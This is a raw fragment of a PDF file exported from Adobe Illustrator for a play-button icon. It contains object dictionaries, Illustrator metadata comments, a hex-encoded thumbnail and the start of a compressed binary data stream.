<</AIS false/BM/Normal/CA 0.899994/OP false/OPM 1/SA true/SMask/None/Type/ExtGState/ca 0.899994/op false>>
endobj
38 0 obj
<</AIS false/BM/Normal/CA 0.399994/OP false/OPM 1/SA true/SMask/None/Type/ExtGState/ca 0.399994/op false>>
endobj
35 0 obj
<</LastModified(D:20150509121340+02'00')/Private 51 0 R>>
endobj
51 0 obj
<</AIMetaData 52 0 R/AIPrivateData1 53 0 R/AIPrivateData2 54 0 R/ContainerVersion 11/CreatorVersion 17/NumBlock 2/RoundtripStreamType 1/RoundtripVersion 17>>
endobj
52 0 obj
<</Length 1127>>stream
%!PS-Adobe-3.0 
%%Creator: Adobe Illustrator(R) 17.0
%%AI8_CreatorVersion: 17.0.1
%%For: (Zizic) ()
%%Title: (icon-play.ai)
%%CreationDate: 5/9/2015 12:13 PM
%%Canvassize: 16383
%%BoundingBox: 317 238 382 303
%%HiResBoundingBox: 317.5 238.499999314829 381.500001907349 302.5
%%DocumentProcessColors: Cyan Magenta Yellow Black
%AI5_FileFormat 13.0
%AI12_BuildNumber: 260
%AI3_ColorUsage: Color
%AI7_ImageSettings: 0
%%RGBProcessColor: 0 0 0 ([Registration])
%AI3_Cropmarks: 317.5 238.5 381.5 302.5
%AI3_TemplateBox: 349.5 270.5 349.5 270.5
%AI3_TileBox: 51.8999938964844 -150.369995117188 646.919952392578 691.489990234375
%AI3_DocumentPreview: None
%AI5_ArtSize: 14400 14400
%AI5_RulerUnits: 6
%AI9_ColorModel: 1
%AI5_ArtFlags: 0 0 0 1 0 0 1 0 0
%AI5_TargetResolution: 800
%AI5_NumLayers: 1
%AI9_OpenToView: 250 308 6 944 614 18 0 0 82 115 0 0 0 1 1 0 1 1 0 1
%AI5_OpenViewLayers: 7
%%PageOrigin:0 0
%AI7_GridSettings: 72 8 72 8 1 0 0.800000011920929 0.800000011920929 0.800000011920929 0.899999976158142 0.899999976158142 0.899999976158142
%AI9_Flatten: 1
%AI12_CMSettings: 00.MS
%%EndComments

endstream
endobj
53 0 obj
<</Length 22813>>stream
%%BoundingBox: 317 238 382 303
%%HiResBoundingBox: 317.5 238.499999314829 381.500001907349 302.5
%AI7_Thumbnail: 128 128 8
%%BeginData: 22646 Hex Bytes
%0000330000660000990000CC0033000033330033660033990033CC0033FF
%0066000066330066660066990066CC0066FF009900009933009966009999
%0099CC0099FF00CC0000CC3300CC6600CC9900CCCC00CCFF00FF3300FF66
%00FF9900FFCC3300003300333300663300993300CC3300FF333300333333
%3333663333993333CC3333FF3366003366333366663366993366CC3366FF
%3399003399333399663399993399CC3399FF33CC0033CC3333CC6633CC99
%33CCCC33CCFF33FF0033FF3333FF6633FF9933FFCC33FFFF660000660033
%6600666600996600CC6600FF6633006633336633666633996633CC6633FF
%6666006666336666666666996666CC6666FF669900669933669966669999
%6699CC6699FF66CC0066CC3366CC6666CC9966CCCC66CCFF66FF0066FF33
%66FF6666FF9966FFCC66FFFF9900009900339900669900999900CC9900FF
%9933009933339933669933999933CC9933FF996600996633996666996699
%9966CC9966FF9999009999339999669999999999CC9999FF99CC0099CC33
%99CC6699CC9999CCCC99CCFF99FF0099FF3399FF6699FF9999FFCC99FFFF
%CC0000CC0033CC0066CC0099CC00CCCC00FFCC3300CC3333CC3366CC3399
%CC33CCCC33FFCC6600CC6633CC6666CC6699CC66CCCC66FFCC9900CC9933
%CC9966CC9999CC99CCCC99FFCCCC00CCCC33CCCC66CCCC99CCCCCCCCCCFF
%CCFF00CCFF33CCFF66CCFF99CCFFCCCCFFFFFF0033FF0066FF0099FF00CC
%FF3300FF3333FF3366FF3399FF33CCFF33FFFF6600FF6633FF6666FF6699
%FF66CCFF66FFFF9900FF9933FF9966FF9999FF99CCFF99FFFFCC00FFCC33
%FFCC66FFCC99FFCCCCFFCCFFFFFF33FFFF66FFFF99FFFFCC110000001100
%000011111111220000002200000022222222440000004400000044444444
%550000005500000055555555770000007700000077777777880000008800
%000088888888AA000000AA000000AAAAAAAABB000000BB000000BBBBBBBB
%DD000000DD000000DDDDDDDDEE000000EE000000EEEEEEEE0000000000FF
%00FF0000FFFFFF0000FF00FFFFFF00FFFFFF
%524C45FDFCFFFDFCFFFDFCFFFDC4FFA8FFFD04A87DA87DFD04A8FFA8FD6E
%FFA8A8FD047D527D527D527D527D527D527D7DA87DA8A8FD64FFA8A87D7D
%527D5252527D527D527D527D527D527D527D5252527D5252527D7DA8A8FD
%5CFFA8A87D7D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D7DFD58FFA8A85252527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D5252527D7DFD54FF7D7D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D52A8A8FD4EFFA87D5252527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D7DA8FD4BFF7D7D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527DA8FD46FFA87D5252527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D52527DFD44FFA87D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D7DA8FD41FF7D7D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527DA8FD3DFFA8527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527DA8FD3BFF7D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D52527DFD39FF7D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D7DFD36FFA87D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D52FD34FFA87D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D52FD32FFA87D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D52A8FD2FFFA87D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D52FD2EFF
%A87D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D525252FD2CFFA87D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D52FD2AFFA87D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D525252FD29FF7D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D7DFD27FFA8527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D52527DFD25FFA852
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527DA8
%FD24FF5252527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527DA8FD22FF7D7D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527DFD21FF7D7D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D52A8FD20FF7D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%52FD1FFF7D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D52527DFD1EFF527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527DA8FD1CFF7D7D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527DFD1BFFA87D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D7DA8527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D52A8FD1AFF7D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%52A8FFA85252527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D52527DFD1AFF527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527DA8FFFFFF7D7D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527DA8FD18FF7D7D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D52A8FFFFA8FFA87D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527DFD17FFA87D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D7DFD06FFA87D7D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D52FD17FFA852
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D52A8FFFFA8FFA8FFFFFF7D7D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52527DFD16FF7D7D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D7DFD09FFA8
%A8527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527DFD15FF
%A87D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFFFA8527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D52A8FD14FFA8527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%A8FD0DFF7D7D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D7DFD
%14FF5252527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA87D5252
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527DFD13FFA87D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527DA8FD11FF7D7D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D52FD13
%FFA8527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFFFFF
%7D7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D52527DFD12FF7D7D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D7DFD13FFA8A8527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527DFD11
%FFA87D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8A87D52527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D525252FD12FF527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D7DFD17FFA87D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527DA8FD10FF7D
%52527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFFFFFA8A85252527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D52A8FD10FFA8527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527DA8FD1BFF7D7D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D7DFD10FF7D7D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA87D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527DFD10FF7D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7DA8FD1DFFA8A8527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D7DFD10FF527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFFFFF7D52527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527DA8FD0EFFA87D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D7DFD21
%FFA87D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D52FD0FFFA8527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D52A8FFFFA8FFA8FF
%A8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8A8
%5252527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527DA8FD0EFFA87D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D7DFD25FF7D7D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D52FD0FFF
%A8527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA87D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527DA8FD0EFFA87D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527DA8FD28FFA8527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D52A8FD0EFFA8527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D52A8
%FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FF
%A8FFA8FFA8FFA8FFA8FFFFFF7D7D527D527D527D527D527D527D527D527D
%527D527D527D527D52527DFD0EFFA87D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527DA8FD29FF
%A8A8527D527D527D527D527D527D527D527D527D527D527D527D527D52A8
%FD0EFFA8527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FF
%A8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFFFFF7D7D527D
%527D527D527D527D527D527D527D527D527D527D527D527D52527DFD0EFF
%A87D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D7DFD26FFA87D7D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D52A8FD0EFFA8527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA8FFA8FFA8FFA87D5252527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527DA8FD0EFFA87D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D7DFD23FF7D7D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D52FD10FF527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D52A8FFFFA8FFA8
%FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8A87D
%52527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527DA8FD0EFFA87D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527DA8FD1FFFA87D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D52FD10FF527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FFFFFF7D7D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527DA8
%FD0FFFA8527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527DA8FD1CFFA87D7D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D7D
%FD10FF7D7D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA8FFA8FFFFFFA87D5252527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527DFD10FFA852
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D7DFD19FF7D7D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527DA8FD10
%FFA852527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%FFA8FFA8FFA8A85252527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D52A8FD11FF527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D7DFD15FFA87D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527DFD12
%FF7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8FF
%FFFF7D7D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D52527DFD12FFA87D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527DA8FD12FFA87D7D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D52A8FD
%12FFA8527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8FFA8FFA8
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527DA8FD13FF7D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527DA8FD0FFF7D7D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%7DFD14FF7D52527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FFA8FFA8A8527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D52A8FD15FF527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D7DFD0BFFA87D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527DA8FD14FFA87D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D52A8FFFFA8FFA8FFA8FFA8FF7D5252
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D52FD16FFA87D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D7DFD08FFA8527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D52A8FD17FF527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D52A8FFFFA8FFA8FFA87D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527DA8FD17FFA8
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527DA8FD05FF7D7D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D7DFD18FFA852527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D52A8FFFFA8A85252527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D52A8FD19
%FF7D7D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527DA8FFA87D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527DFD1AFFA8527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D7D52527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527DA8FD1B
%FF7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D7DFD1CFFA87D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D52A8FD1DFF7D7D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D52A8FD1FFF5252527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527DA8FD1FFFA8527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527DA8FD21FF7D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D5252
%7DFD23FF7D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D7DFD24FFA852527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D52A8FD25FF7D7D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D52A8FD27FF7D52527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527DFD29FF7D7D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527DFD2BFF527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527DA8FD2CFF527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527DA8FD2DFFA8527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527DA8FD30FF527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527DA8FD32FF5252
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527DA8FD34FF7D7D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527DA8FD36FF7D52527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D5252527DA8FD38FF7D7D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%52A8FD3BFFA87D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D52A8FD3DFFA87D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D7DFD41FFA85252527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D5252527D7DFD44FF7D
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D52A8FD47FF
%A87D5252527D527D527D527D527D527D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D7DA8FD4BFF7D
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D527D527D527D527D527DA8FD4EFFA87D5252527D52
%7D527D527D527D527D527D527D527D527D527D527D527D527D527D527D52
%7D527D527D527D52527DA8FD53FFA87D527D527D527D527D527D527D527D
%527D527D527D527D527D527D527D527D527D527D527D527D7DA8A8FD57FF
%A87D7D5252527D527D527D527D527D527D527D527D527D527D527D527D52
%7D5252527D527DA8FD5EFFA87D527D527D527D527D527D527D527D527D52
%7D527D527D527D527D7DA8A8FD64FFA8A87D7D527DFD0B527D527D7DA87D
%A8A8FD6EFFA8FFFD07A8FFA8FDFCFFFDFCFFFDFCFFFDC5FFFF
%%EndData

endstream
endobj
54 0 obj
<</Length 20878>>stream
%AI12_CompressedDatax��}iw긲��k� #��63�!#	�'b�I�{��?I�d[�ep����g�4`�J*�J5J��v'^�=!�J0��_��I��T�����x1�K��U$��lUj�J�[A�
�I=K��i�~�g؏���p>��þ8�O��?�h���U~�g��$ǰ� ��T�}���_�l6�h�fS���,.&���,�S��\�K僩<L1�ysx%�̍�,�.�)6��
�6�a�?���Ri��%2DU�/��ɼ-�}a6��cQ����$x��'|�A�ſ��1��wJ�L�>��<Ȧ�J-�����|��q���{�����8~F�纭o�SG��A�RD��F���/�t%|�,B�DTȒ8���zF�6H��Z�32d*��i�����jS06�,�&�B6�O��q6�$RY�S�esl>̦���s��Ɂ
l"
�b�T:�Sa�d~
����sq"(�,I�<��4���GW�� �L�s0�,�� �Lc��>�
�X���⚗>�9`q��#V�kX����8fl�b*L��[�U.�R���Y6d�>`D�����*�!C����s~!
?���ڽ\�!
:#�`^�����3��8�ؙ��
�,�ɳi��e��0Q��r��)�8��&���
�u�V+`�	�ݱ��<տ�g�b����\Ж�8�׹�,�m��aC���]����$�@栯���@�L#.�W�w�du��/a,N1��/�d��)
��R=�`��'<�]��
,`����P
��#T���(��8^�I������V��\{��?��&���a����4������[���}��-�rir1��)-f��kQ봕(�t����;�1	x�������C⧟�>	>Ṇ��]*.�#��0iȬo�IxT&�
�`i�H
�6���y�H���KC�e-��}N����p.��%~O�B�|�S�3lY�Z�p3]�E�[@<�9,�NA~Ռ������D�{���`4O`g��K$�<翅`����$h�����o�l𞇿\�?�\��n��u*��7�+d�\&Á}(O����B>��g�i�K�a�i�+d
